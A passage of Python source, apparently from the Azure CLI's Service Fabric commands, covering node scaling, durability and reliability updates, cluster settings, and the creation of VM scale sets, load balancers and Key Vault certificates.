raise CLIError("--number-of-nodes-to-add must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
vmss.sku.capacity = vmss.sku.capacity + number_of_nodes_to_add
# update vmss
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
# update cluster
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_remove):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_remove = int(number_of_nodes_to_remove)
if number_of_nodes_to_remove <= 0:
raise CLIError("--number-of-nodes-to-remove must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
reliability_required_instance_count = _get_target_instance(cluster.reliability_level)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
vmss.sku.capacity = vmss.sku.capacity - number_of_nodes_to_remove
if vmss.sku.capacity < reliability_required_instance_count:
raise CLIError("Can't delete node since current reliability level is {} requires at least {} nodes.".format(
cluster.reliability_level,
reliability_required_instance_count))
# update vmss
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
# update cluster
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_durability(cmd, client, resource_group_name, cluster_name, node_type, durability_level):
cli_ctx = cmd.cli_ctx
# get cluster node type durablity
cluster = client.get(resource_group_name, cluster_name)
node_type_refs = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if not node_type_refs:
raise CLIError("Failed to find the node type in the cluster.")
node_type_ref = node_type_refs[0]
curr_node_type_durability = node_type_ref.durability_level
# get vmss extension durability
compute_client = compute_client_factory(cli_ctx)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type)
_get_sf_vm_extension(vmss)
fabric_ext_ref = _get_sf_vm_extension(vmss)
if fabric_ext_ref is None:
raise CLIError("Failed to find service fabric extension.")
curr_vmss_durability_level = fabric_ext_ref.settings['durabilityLevel']
# check upgrade
if curr_node_type_durability.lower() != curr_vmss_durability_level.lower():
logger.warning(
"The durability level is currently mismatched between the cluster ('%s') and the VM extension ('%s').",
curr_node_type_durability,
curr_vmss_durability_level)
# update cluster node type durability
if curr_node_type_durability.lower() != durability_level.lower():
node_type_ref.durability_level = durability_level
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
update_cluster_poll = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation(cli_ctx)(update_cluster_poll)
# update vmss sf extension durability
if curr_vmss_durability_level.lower() != durability_level.lower():
fabric_ext_ref.settings['durabilityLevel'] = durability_level
fabric_ext_ref.settings['enableParallelJobs'] = True
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
return client.get(resource_group_name, cluster_name)
def update_cluster_upgrade_type(client,
resource_group_name,
cluster_name,
upgrade_mode,
version=None):
if upgrade_mode.lower() != 'manual' and upgrade_mode.lower() != 'automatic':
raise CLIError(
'--upgrade-mode can either be \'manual\' or \'automatic\'')
cluster = client.get(resource_group_name, cluster_name)
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
if upgrade_mode.lower() == 'manual':
if version is None:
raise CLIError(
'When \'--upgrade-mode\' set to \'manual\', --version must be given')
patch_request.cluster_code_version = version
patch_request.upgrade_mode = upgrade_mode
return client.update(resource_group_name, cluster_name, patch_request)
def set_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
value=None,
settings_section_description=None):
def _set(setting_dict, section, parameter, value):
if section not in setting_dict:
setting_dict[section] = {}
setting_dict[section][parameter] = value
return setting_dict
if settings_section_description and (section or parameter or value):
raise CLIError(
'Only can use either \'--settings-section-description\' or \'--section\', \'--parameter\' and \'--value\' to set the settings')
if section or parameter or value:
if section is None or parameter is None or value is None:
raise CLIError(
'\'--section\' , \'--parameter\' and \'--value\' can not be None')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting and 'value' in setting:
setting_dict = _set(setting_dict, setting['section'],
setting['parameter'], setting['value'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _set(setting_dict, section, parameter, value)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
settings_section_description=None):
def _remove(setting_dict, section, parameter):
if section not in setting_dict:
raise CLIError(
"Can't find the section {} in the settings".format(section))
if parameter not in setting_dict[section]:
raise CLIError(
"Can't find the parameter {} in the settings".format(parameter))
del setting_dict[section][parameter]
return setting_dict
if settings_section_description and (section or parameter):
raise CLIError(
'Only can use either \'--settings-section-description\' or \'--section\' and \'--parameter \' to set the settings')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting:
setting_dict = _remove(setting_dict, setting['section'], setting['parameter'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _remove(setting_dict, section, parameter)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_reliability_level(cmd,
client,
resource_group_name,
cluster_name, reliability_level,
auto_add_node=False):
cli_ctx = cmd.cli_ctx
reliability_level = reliability_level.lower()
cluster = client.get(resource_group_name, cluster_name)
instance_now = _get_target_instance(cluster.reliability_level)
instance_target = _get_target_instance(reliability_level)
node_types = [n for n in cluster.node_types if n.is_primary]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
compute_client = compute_client_factory(cli_ctx)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
if instance_target == instance_now:
return cluster
if instance_target > instance_now:
if vmss.sku.capacity < instance_target:
if auto_add_node is not True:
raise CLIError('Please use --auto_add_node to automatically increase the nodes,{} requires {} nodes, but currenty there are {}'.
format(reliability_level, instance_target, vmss.sku.capacity))
vmss.sku.capacity = instance_target
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(
node_types=cluster.node_types, reliability_level=reliability_level)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node_type(cmd,
client,
resource_group_name,
cluster_name,
node_type,
capacity,
vm_user_name,
vm_password,
vm_sku=DEFAULT_SKU,
vm_tier=DEFAULT_TIER,
durability_level=DEFAULT_DURABILITY_LEVEL):
if durability_level.lower() == 'gold':
if vm_sku.lower() != 'standard_d15_v2' and vm_sku.lower() != 'standard_g5':
raise CLIError(
'Only Standard_D15_v2 and Standard_G5 supports Gold durability, please specify --vm-sku to right value')
cluster = client.get(resource_group_name, cluster_name)
if any(n for n in cluster.node_types if n.name.lower() == node_type):
raise CLIError("node type {} already exists in the cluster".format(node_type))
_create_vmss(cmd, resource_group_name, cluster_name, cluster, node_type, durability_level, vm_password, vm_user_name, vm_sku, vm_tier, capacity)
_add_node_type_to_sfrp(cmd, client, resource_group_name, cluster_name, cluster, node_type, capacity, durability_level)
return client.get(resource_group_name, cluster_name)
def _add_node_type_to_sfrp(cmd, client, resource_group_name, cluster_name, cluster, node_type_name, capacity, durability_level):
cluster.node_types.append(NodeTypeDescription(name=node_type_name,
client_connection_endpoint_port=DEFAULT_CLIENT_CONNECTION_ENDPOINT,
http_gateway_endpoint_port=DEFAULT_HTTP_GATEWAY_ENDPOINT,
is_primary=False,
vm_instance_count=int(capacity),
durability_level=durability_level,
application_ports=EndpointRangeDescription(
start_port=DEFAULT_APPLICATION_START_PORT, end_port=DEFAULT_APPLICATION_END_PORT),
ephemeral_ports=EndpointRangeDescription(
start_port=DEFAULT_EPHEMERAL_START, end_port=DEFAULT_EPHEMERAL_END)))
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
poller = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation(cmd.cli_ctx)(poller)
def _create_vmss(cmd, resource_group_name, cluster_name, cluster, node_type_name, durability_level, vm_password, vm_user_name, vm_sku, vm_tier, capacity):
cli_ctx = cmd.cli_ctx
subnet_name = "subnet_{}".format(1)
network_client = network_client_factory(cli_ctx)
location = _get_resource_group_by_name(cli_ctx, resource_group_name).location
virtual_network = list(
network_client.virtual_networks.list(resource_group_name))[0]
subnets = list(network_client.subnets.list(
resource_group_name, virtual_network.name))
address_prefix = None
index = None
for x in range(1, 255):
address_prefix = '10.0.{}.0/24'.format(x)
index = x
found = False
for s in subnets:
if address_prefix == s.address_prefix:
found = True
if subnet_name.lower() == s.name.lower():
subnet_name = "subnet_{}".format(x)
if found is False:
break
if address_prefix is None:
raise CLIError("Failed to generate the address prefix")
poller = network_client.subnets.create_or_update(resource_group_name,
virtual_network.name,
subnet_name,
Subnet(address_prefix=address_prefix))
subnet = LongRunningOperation(cli_ctx)(poller)
public_address_name = 'LBIP-{}-{}{}'.format(
cluster_name.lower(), node_type_name.lower(), index)
dns_label = '{}-{}{}'.format(cluster_name.lower(),
node_type_name.lower(), index)
lb_name = 'LB-{}-{}{}'.format(cluster_name.lower(),
node_type_name.lower(), index)
if len(lb_name) >= 24:
lb_name = '{}{}'.format(lb_name[0:21], index)
poller = network_client.public_ip_addresses.create_or_update(resource_group_name,
public_address_name,
PublicIPAddress(public_ip_allocation_method='Dynamic',
location=location,
dns_settings=PublicIPAddressDnsSettings(domain_name_label=dns_label)))
publicIp = LongRunningOperation(cli_ctx)(poller)
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cli_ctx)
new_load_balancer_id = '/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}'.format(
subscription_id, resource_group_name, lb_name)
backend_address_poll_name = "LoadBalancerBEAddressPool"
frontendip_configuration_name = "LoadBalancerIPConfig"
probe_name = "FabricGatewayProbe"
probe_http_name = "FabricHttpGatewayProbe"
inbound_nat_pools_name = "LoadBalancerBEAddressNatPool"
new_load_balancer = LoadBalancer(id=new_load_balancer_id,
location=location,
frontend_ip_configurations=[FrontendIPConfiguration(name=frontendip_configuration_name,
public_ip_address=PublicIPAddress(id=publicIp.id))],
backend_address_pools=[BackendAddressPool(
name=backend_address_poll_name)],
load_balancing_rules=[LoadBalancingRule(name='LBRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.
format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_TCP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_TCP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_name))),
LoadBalancingRule(name='LBHttpRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_HTTP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_HTTP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_http_name)))],
probes=[Probe(protocol='tcp',
name=probe_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_TCP_PORT),
Probe(protocol='tcp',
name=probe_http_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_HTTP_PORT)],
inbound_nat_pools=[InboundNatPool(protocol='tcp',
name=inbound_nat_pools_name,
backend_port=DEFAULT_BACKEND_PORT,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port_range_start=DEFAULT_FRONTEND_PORT_RANGE_START,
frontend_port_range_end=DEFAULT_FRONTEND_PORT_RANGE_END)])
poller = network_client.load_balancers.create_or_update(
resource_group_name, lb_name, new_load_balancer)
LongRunningOperation(cli_ctx)(poller)
new_load_balancer = network_client.load_balancers.get(
resource_group_name, lb_name)
backend_address_pools = []
inbound_nat_pools = []
for p in new_load_balancer.backend_address_pools:
backend_address_pools.append(SubResource(id=p.id))
for p in new_load_balancer.inbound_nat_pools:
inbound_nat_pools.append(SubResource(id=p.id))
network_config_name = 'NIC-{}-{}'.format(node_type_name.lower(), node_type_name.lower())
if len(network_config_name) >= 24:
network_config_name = network_config_name[0:22]
ip_config_name = 'Nic-{}'.format(node_type_name.lower())
if len(ip_config_name) >= 24:
ip_config_name = network_config_name[0:22]
vm_network_profile = VirtualMachineScaleSetNetworkProfile(network_interface_configurations=[VirtualMachineScaleSetNetworkConfiguration(name=network_config_name,
primary=True,
ip_configurations=[VirtualMachineScaleSetIPConfiguration(name=ip_config_name,
load_balancer_backend_address_pools=backend_address_pools,
load_balancer_inbound_nat_pools=inbound_nat_pools,
subnet=ApiEntityReference(id=subnet.id))])])
compute_client = compute_client_factory(cli_ctx)
node_type_name_ref = cluster.node_types[0].name
vmss_reference = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type_name_ref)
def create_vhd(cli_ctx, resource_group_name, cluster_name, node_type, location):
storage_name = '{}{}'.format(cluster_name.lower(), node_type.lower())
name = ""
vhds = []
for n in storage_name:
if n.isalpha() or n.isdigit():
name += n
if len(name) >= 21:
break
for i in range(1, 6):
acc = create_storage_account(
cli_ctx, resource_group_name.lower(), '{}{}'.format(name, i), location)
vhds.append('{}{}'.format(acc[0].primary_endpoints.blob, 'vhd'))
return vhds
def create_storage_account(cli_ctx, resource_group_name, storage_name, location):
from azure.mgmt.storage.models import Sku, SkuName
storage_client = storage_client_factory(cli_ctx)
LongRunningOperation(cli_ctx)(storage_client.storage_accounts.create(resource_group_name,
storage_name,
StorageAccountCreateParameters(sku=Sku(name=SkuName.standard_lrs),
kind='storage',
location=location)))
acc_prop = storage_client.storage_accounts.get_properties(
resource_group_name, storage_name)
acc_keys = storage_client.storage_accounts.list_keys(
resource_group_name, storage_name)
return acc_prop, acc_keys
publisher = 'MicrosoftWindowsServer'
offer = 'WindowsServer'
version = 'latest'
sku = os_dic[DEFAULT_OS]
if cluster.vm_image.lower() == 'linux':
publisher = 'Canonical'
offer = 'UbuntuServer'
version = 'latest'
sku = os_dic['UbuntuServer1604']
storage_profile = VirtualMachineScaleSetStorageProfile(image_reference=ImageReference(publisher=publisher,
offer=offer,
sku=sku,
version=version),
os_disk=VirtualMachineScaleSetOSDisk(caching='ReadOnly',
create_option='FromImage',
name='vmssosdisk',
vhd_containers=create_vhd(cli_ctx, resource_group_name, cluster_name, node_type_name, location)))
os_profile = VirtualMachineScaleSetOSProfile(computer_name_prefix=node_type_name,
admin_password=vm_password,
admin_username=vm_user_name,
secrets=vmss_reference.virtual_machine_profile.os_profile.secrets)
diagnostics_storage_name = cluster.diagnostics_storage_account_config.storage_account_name
diagnostics_ext = None
fabric_ext = None
diagnostics_exts = [e for e in vmss_reference.virtual_machine_profile.extension_profile.extensions if e.type1.lower(
) == 'IaaSDiagnostics'.lower()]
if any(diagnostics_exts):
diagnostics_ext = diagnostics_exts[0]
diagnostics_account = diagnostics_ext.settings['StorageAccount']
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_account)
import json
json_data = json.loads(
'{"storageAccountName": "", "storageAccountKey": "", "storageAccountEndPoint": ""}')
json_data['storageAccountName'] = diagnostics_account
json_data['storageAccountKey'] = list_results.keys[0].value
json_data['storageAccountEndPoint'] = "https://core.windows.net/"
diagnostics_ext.protected_settings = json_data
fabric_exts = [e for e in vmss_reference.virtual_machine_profile.extension_profile.extensions if e.type1.lower(
) == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type1.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
if any(fabric_exts):
fabric_ext = fabric_exts[0]
if fabric_ext is None:
raise CLIError("No valid fabric extension found")
fabric_ext.settings['nodeTypeRef'] = node_type_name
fabric_ext.settings['durabilityLevel'] = durability_level
if 'nicPrefixOverride' not in fabric_ext.settings:
fabric_ext.settings['nicPrefixOverride'] = address_prefix
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_storage_name)
import json
json_data = json.loads(
'{"StorageAccountKey1": "", "StorageAccountKey2": ""}')
fabric_ext.protected_settings = json_data
fabric_ext.protected_settings['StorageAccountKey1'] = list_results.keys[0].value
fabric_ext.protected_settings['StorageAccountKey2'] = list_results.keys[1].value
extensions = [fabric_ext]
if diagnostics_ext:
extensions.append(diagnostics_ext)
vm_ext_profile = VirtualMachineScaleSetExtensionProfile(
extensions=extensions)
virtual_machine_scale_set_profile = VirtualMachineScaleSetVMProfile(extension_profile=vm_ext_profile,
os_profile=os_profile,
storage_profile=storage_profile,
network_profile=vm_network_profile)
poller = compute_client.virtual_machine_scale_sets.create_or_update(resource_group_name,
node_type_name,
VirtualMachineScaleSet(location=location,
sku=ComputeSku(
name=vm_sku, tier=vm_tier, capacity=capacity),
overprovision=False,
upgrade_policy=UpgradePolicy(
mode=UpgradeMode.automatic),
virtual_machine_profile=virtual_machine_scale_set_profile))
LongRunningOperation(cli_ctx)(poller)
def _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster_id, node_type_name):
vmsses = list(compute_client.virtual_machine_scale_sets.list(resource_group_name))
for vmss in vmsses:
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is not None:
curr_cluster_id = _get_cluster_id_in_sf_extension(fabric_ext)
if curr_cluster_id.lower() == cluster_id.lower() and fabric_ext.settings["nodeTypeRef"].lower() == node_type_name.lower():
return vmss
raise CLIError("Failed to find vmss in resource group {} for cluster id {} and node type {}".format(resource_group_name, cluster_id, node_type_name))
def _verify_cert_function_parameter(certificate_file=None,
certificate_password=None,
vault_name=None, # pylint: disable=unused-argument
vault_resource_group_name=None, # pylint: disable=unused-argument
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
if certificate_file:
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--certificate-file\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--certificate-file\' is present')
else:
if secret_identifier:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if certificate_password:
raise CLIError(
'\'--certificate-password\' is ingored if \'--secret-identifier\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--secret-identifier\' is present')
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--secret-identifier\' is present')
else:
if certificate_subject_name:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if secret_identifier:
raise CLIError(
'\'--secret-identifier\' is ingored if \'--secret-identifier\' is present')
else:
raise CLIError("Invalid input")
def _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
_verify_cert_function_parameter(certificate_file, certificate_password,
vault_name, vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
output_file = None
rg = _get_resource_group_by_name(cli_ctx, resource_group_name)
location = rg.location
vault_id = None
secret_url = None
certificate_thumbprint = None
VaultProperties = cmd.get_models('VaultProperties', resource_type=ResourceType.MGMT_KEYVAULT)
_create_keyvault.__doc__ = VaultProperties.__doc__
if secret_identifier is not None:
vault = _get_vault_from_secret_identifier(cli_ctx, secret_identifier)
vault_id = vault.id
certificate_thumbprint = _get_thumbprint_from_secret_identifier(
cli_ctx, vault, secret_identifier)
secret_url = secret_identifier
else:
if vault_resource_group_name is None:
logger.info("vault_resource_group_name not set, using %s.", resource_group_name)
vault_resource_group_name = resource_group_name
if vault_name is None:
logger.info("vault_name not set using '%s' as vault name.", vault_resource_group_name)
vault_name = vault_resource_group_name
vault = _safe_get_vault(cli_ctx, vault_resource_group_name, vault_name)
if certificate_file is not None:
if vault is None:
logger.info("Creating key vault")
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True).result()
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(certificate_subject_name, resource_group_name)
logger.info("Import certificate")
result = import_certificate(
cli_ctx, vault_uri, certificate_name, certificate_file, password=certificate_password)
vault_id = vault.id
secret_url = result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(result.x509_thumbprint))
else:
if vault is None:
logger.info("Creating key vault")
if cmd.supported_api_version(resource_type=ResourceType.MGMT_KEYVAULT, min_api='2018-02-14'):
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True).result()
else:
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
logger.info("Wait for key vault ready")
time.sleep(20)
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(certificate_subject_name, resource_group_name)
policy = _get_default_policy(cli_ctx, certificate_subject_name)
logger.info("Creating self-signed certificate")
_create_self_signed_key_vault_certificate.__doc__ = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'key_vault_client#KeyVaultClient').__doc__
result = _create_self_signed_key_vault_certificate(
cli_ctx, vault_uri, certificate_name, policy, certificate_output_folder=certificate_output_folder)
kv_result = result[0]
output_file = result[1]
vault_id = vault.id
secret_url = kv_result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(kv_result.x509_thumbprint))
return vault_id, secret_url, certificate_thumbprint, output_file
# pylint: disable=inconsistent-return-statements
def _add_cert_to_vmss(cli_ctx, vmss, resource_group_name, vault_id, secret_url):
compute_client = compute_client_factory(cli_ctx)
secrets = [
s for s in vmss.virtual_machine_profile.os_profile.secrets if s.source_vault.id == vault_id]
if secrets is None or secrets == []:
if vmss.virtual_machine_profile.os_profile.secrets is None:
vmss.virtual_machine_profile.os_profile.secrets = []
new_vault_certificates = []
new_vault_certificates.append(VaultCertificate(certificate_url=secret_url, certificate_store='my'))
new_source_vault = SubResource(id=vault_id)
vmss.virtual_machine_profile.os_profile.secrets.append(VaultSecretGroup(source_vault=new_source_vault,
vault_certificates=new_vault_certificates))
else:
if secrets[0].vault_certificates is not None:
certs = [
c for c in secrets[0].vault_certificates if c.certificate_url == secret_url]
if certs is None or certs == []:
secrets[0].vault_certificates.append(
VaultCertificate(certificate_url=secret_url, certificate_store='my'))
else:
return
else:
secrets[0].vault_certificates = []
secrets[0].vault_certificates.append(
VaultCertificate(secret_url, 'my'))
poller = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
return LongRunningOperation(cli_ctx)(poller)
def _get_sf_vm_extension(vmss):
fabric_ext = [ext for ext in vmss.virtual_machine_profile.extension_profile.extensions
if ext.type1 is not None and (ext.type1.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or ext.type1.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME)]
if fabric_ext is None or fabric_ext == []:
return None
return fabric_ext[0]
def _get_cluster_id_in_sf_extension(fabric_ext):
cluster_endpoint = fabric_ext.settings["clusterEndpoint"]
endpoint_list = cluster_endpoint.split('/')
cluster_id = endpoint_list[len(endpoint_list) - 1]
return cluster_id
def _add_cert_to_all_vmss(cli_ctx, resource_group_name, cluster_id, vault_id, secret_url):
threads = []
import threading
compute_client = compute_client_factory(cli_ctx)
vmsses = list(compute_client.virtual_machine_scale_sets.list(resource_group_name))
if vmsses is not None:
for vmss in vmsses:
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is not None and (cluster_id is None or _get_cluster_id_in_sf_extension(fabric_ext).lower() == cluster_id.lower()):
t = threading.Thread(target=_add_cert_to_vmss, args=[cli_ctx, vmss, resource_group_name, vault_id, secret_url])
t.start()
threads.append(t)
for t in threads:
t.join()
def _get_resource_group_by_name(cli_ctx, resource_group_name):
try:
resouce_client = resource_client_factory(cli_ctx).resource_groups
return resouce_client.get(resource_group_name)
except Exception as ex: # pylint: disable=broad-except
error = getattr(ex, 'Azure Error', ex)
if error != 'ResourceGroupNotFound':
return None
raise
def _create_resource_group_name(cli_ctx, rg_name, location, tags=None):
ResourceGroup = get_sdk(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, 'ResourceGroup', mod='models')
client = resource_client_factory(cli_ctx).resource_groups
parameters = ResourceGroup(location=location, tags=tags)
client.create_or_update(rg_name, parameters)
# pylint: disable=inconsistent-return-statements
def _get_target_instance(reliability_level):
level = reliability_level.lower()
if level == 'none':
return 1
if level == 'bronze':
return 3
if level == 'silver':
return 5
if level == 'gold':
return 7
if level == 'platinum':
return 9
# pylint: disable=inconsistent-return-statements
def _get_reliability_level(cluster_size):
size = int(cluster_size)
if 0 < size < 3:
return 'None'
if 3 <= size < 5:
return 'Bronze'
if 5 <= size < 7:
return 'Silver'
if 7 <= size < 9:
return 'Gold'
if size >= 9:
return 'Platinum'
def _fabric_settings_to_dict(fabric_settings):
d = {}
if fabric_settings:
for s1 in fabric_settings:
section_name = s1.name
if section_name not in d:
d[section_name] = {}
if s1.parameters:
for s2 in s1.parameters:
parameter_name = s2.name
d[section_name][parameter_name] = s2.value
return d
def _dict_to_fabric_settings(setting_dict):
settings = []
if setting_dict and any(setting_dict):
for k, v in setting_dict.items():
parameters = []
setting_des = SettingsSectionDescription(name=k, parameters=parameters)
for kk, vv in v.items():
setting_des.parameters.append(
SettingsParameterDescription(name=kk, value=vv))
if setting_des.parameters and any(setting_des.parameters):
settings.append(setting_des)
return settings
def _deploy_arm_template_core(cmd,
resource_group_name,
template,
parameters,
deployment_name=None,
mode='incremental',
validate_only=False,
no_wait=False):
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, template_link=None, parameters=parameters, mode=mode)
client = resource_client_factory(cmd.cli_ctx)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate_only:
deploy_poll = sdk_no_wait(no_wait, client.deployments.validate, resource_group_name, deployment_name,
deployment)
else:
deploy_poll = sdk_no_wait(no_wait, client.deployments.create_or_update, resource_group_name,
deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(deploy_poll)
if validate_only:
return sdk_no_wait(no_wait, client.deployments.validate, resource_group_name, deployment_name,
properties)
deploy_poll = sdk_no_wait(no_wait, client.deployments.create_or_update, resource_group_name, deployment_name,
properties)
return LongRunningOperation(cmd.cli_ctx)(deploy_poll)
def _get_vault_name(resource_group_name, vault_name):
if not vault_name:
return resource_group_name
return vault_name
def _get_certificate_name(certificate_subject_name, resource_group_name):
if certificate_subject_name is None:
certificate_name = resource_group_name
else:
certificate_name = certificate_subject_name
name = ""
for n in certificate_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
certificate_name = name
if certificate_subject_name is None:
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
certificate_name = "{}{}".format(certificate_name, suffix)
return certificate_name
# pylint: disable=inconsistent-return-statements
def _get_vault_from_secret_identifier(cli_ctx, secret_identifier):
key_vault_client = keyvault_client_factory(cli_ctx).vaults
vault_name = urlparse(secret_identifier).hostname.split('.')[0]
vaults = key_vault_client.list()
if vaults is not None:
vault = [v for v in vaults if v.name.lower() == vault_name.lower()]
if vault:
return vault[0]
raise CLIError("Unable to find vault with name '{}'. Please make sure the secret identifier '{}' is correct.".format(vault_name, secret_identifier))
